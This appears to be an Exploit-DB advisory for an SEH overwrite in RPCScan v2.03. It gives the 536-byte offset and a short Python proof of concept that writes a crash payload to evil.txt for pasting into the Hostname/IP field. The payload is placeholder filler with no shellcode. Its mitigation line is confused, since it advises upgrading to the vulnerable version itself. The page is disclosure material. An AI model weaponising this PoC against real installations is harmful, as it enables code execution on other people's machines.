RPCScan v2.03 Hostname/IP Field SEH Overwrite POC

vendor:

RPCScan

by:

Nipun Jaswal

7,6

CVSS

HIGH

SEH Overwrite POC

119

CWE

Product Name: RPCScan

Affected Version From: 2.03

Affected Version To: 2.03

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 Home Basic

2016

RPCScan v2.03 Hostname/IP Field SEH Overwrite POC

RPCScan v2.03 is vulnerable to a SEH Overwrite vulnerability. By supplying a malicious payload in the Hostname/IP field, an attacker can overwrite the SEH frame and execute arbitrary code. The offset to the SEH frame is 536 bytes and the address of the next SEH frame and the address of the handler code are both 4 bytes long.

Mitigation:

Upgrade to the latest version of RPCScan v2.03 or later.

Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title     : RPCScan v2.03 Hostname/IP Field SEH Overwrite POC
# Discovery by      : Nipun Jaswal
# Email             : mail@nipunjaswal.info
# Discovery Date    : 08/05/2016
# Vendor Homepage   : http://samspade.org
# Software Link     : http://www.mcafee.com/in/downloads/free-tools/rpcscan.aspx#
# Tested Version    : 2.03
# Vulnerability Type: SEH Overwrite POC
# Tested on OS      : Windows 7 Home Basic
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
#  -----------------------------------NOTES----------------------------------------------#
##########################################################################################

#SEH chain of main thread
#Address    SE handler
#0012FAA0   43434343
#42424242   *** CORRUPT ENTRY ***

# Offset to the SEH Frame is 536
buffer = "A"*536
# Address of the Next SEH Frame
nseh = "B"*4
# Address to the Handler Code, Generally P/P/R Address
seh = "C" *4
f = open("evil.txt", "wb")
f.write(buffer+nseh+seh)
f.close()